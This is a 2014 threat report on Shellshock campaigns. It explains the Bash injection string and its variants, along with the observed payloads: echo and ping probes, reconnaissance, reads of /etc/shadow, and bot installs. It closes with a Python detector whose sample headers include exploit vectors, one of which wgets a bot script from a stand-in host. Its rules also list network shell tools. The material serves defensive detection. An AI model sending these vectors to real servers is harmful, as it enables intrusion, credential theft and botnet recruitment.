Attack Campaign
October 10, 2014

Shellshock: Malicious Bash, Obfuscated perlb0t, Echo Probes, and More

By Maxim Zavodchik, Oz Elisyan


Shellshock can take advantage of HTTP headers as well as other mechanisms to enable unauthorized access to the underlying system shell, Bash. The Shellshock attack takes advantage of a flaw in Bash that enables attackers to execute remote commands that would ordinarily be blocked. It's been rated the highest risk possible because remote command execution is potentially very, very dangerous.

Once the "Shellshock" vulnerability opened the door to running arbitrary commands on any exposed CGI server, a variety of actors moved in to pursue their own goals.

The magic string that opened this door was, in almost all cases:

() { :;};

A variation of this placed a single word inside the curly brackets instead of the ":" (no-operation) builtin:

() { foo;};

In some very rare cases it might look like this:

() {echo "Hello World";};

Although the exploit may be delivered in different HTTP headers (those the CGI handler converts into environment variables), "User-Agent" is used in most cases.

From our observations, the payload delivered once the vulnerability is exploited (the actual commands that get executed) serves several intentions. The simplest are the "echo" probes, which send a vector containing a specific string and expect to see it in the server's response, and the "ping back" probes, which inject a ping command and expect to see the server pinging them. These are usually scanners indexing the vulnerable servers out there. Others send shell commands, mostly for information gathering, such as "uname" or "id", while more aggressive vectors read sensitive files, such as "/etc/shadow", or create dummy files on the file system.

However, the most severe threats are those which open a back door or completely compromise the server. These attacks have a very familiar payload fingerprint: they come from the same cyber-criminals who constantly run their operations on the web, hunting for vulnerable web servers, and Shellshock is a fresh opportunity for them to expand their army of zombie machines.

These serious exploits usually deploy the "Kaiten" (AKA "Tsunami") bot or variations of "perlb0t", making the compromised server part of a DDoS business scheme.
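As an added example (not code from the original report), the following Python classifies HTTP header values by the payload categories described above: it looks for the "() {" function-definition prefix that vulnerable Bash imported, then inspects the commands after the function body. The header values, addresses and intent keywords are constructed samples and assumptions a defender would tune against their own logs.

```python
import re
from urllib.parse import unquote

# Constructed sample header values (not captured traffic). Each mirrors one payload
# class the report describes; one is URL-encoded and the last two are benign.
SAMPLE_HEADERS = [
    ("User-Agent", '() { :;}; echo shellshock-probe-7f3a'),
    ("Referer",    '() { foo;}; /bin/ping -c 1 198.51.100.7'),
    ("User-Agent", '() {echo "Hello World";}; /bin/bash -c "uname -a; id"'),
    ("Cookie",     '() { :;}; /bin/cat /etc/shadow'),
    ("User-Agent", '()%20%7B%20:;%7D;%20wget%20http://203.0.113.9/bot.pl'),
    ("User-Agent", 'Mozilla/5.0 (compatible; legit-crawler/1.0)'),
    ("User-Agent", 'curl/7.38.0'),
]

# Vulnerable Bash imported any environment value starting with "() {" as a
# function; that prefix (with optional extra whitespace) is the signature to match.
MARKER_RE = re.compile(r'\(\)\s*\{')

# Intent rules ordered most severe first; the first one matching the payload wins.
INTENT_RULES = [
    ("backdoor",   re.compile(r'\b(wget|curl|nc|perl|python)\b|/dev/tcp/')),
    ("file-read",  re.compile(r'/etc/(shadow|passwd)\b')),
    ("recon",      re.compile(r'\b(uname|id|whoami)\b')),
    ("ping-back",  re.compile(r'\bping\b')),
    ("echo-probe", re.compile(r'\becho\b')),
]

def classify(value):
    """Return the payload intent for one header value, or None if it is not a
    Shellshock vector. The commands after the body's closing brace are the payload."""
    decoded = unquote(value)            # attackers often URL-encode the vector
    m = MARKER_RE.search(decoded)
    if not m:
        return None
    body_end = decoded.find('}', m.end())
    payload = decoded[body_end + 1:] if body_end != -1 else ''
    for intent, rx in INTENT_RULES:
        if rx.search(payload):
            return intent
    return "unknown"

def scan(headers):
    """Return (header name, intent) for every value flagged as a Shellshock vector."""
    return [(n, i) for n, v in headers if (i := classify(v)) is not None]
```

Matching only on the "() {" prefix mirrors the check Bash itself performed, so the rule catches the ":" , bare-word and echo variants alike; the intent rules are coarse and only meant to triage what follows.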
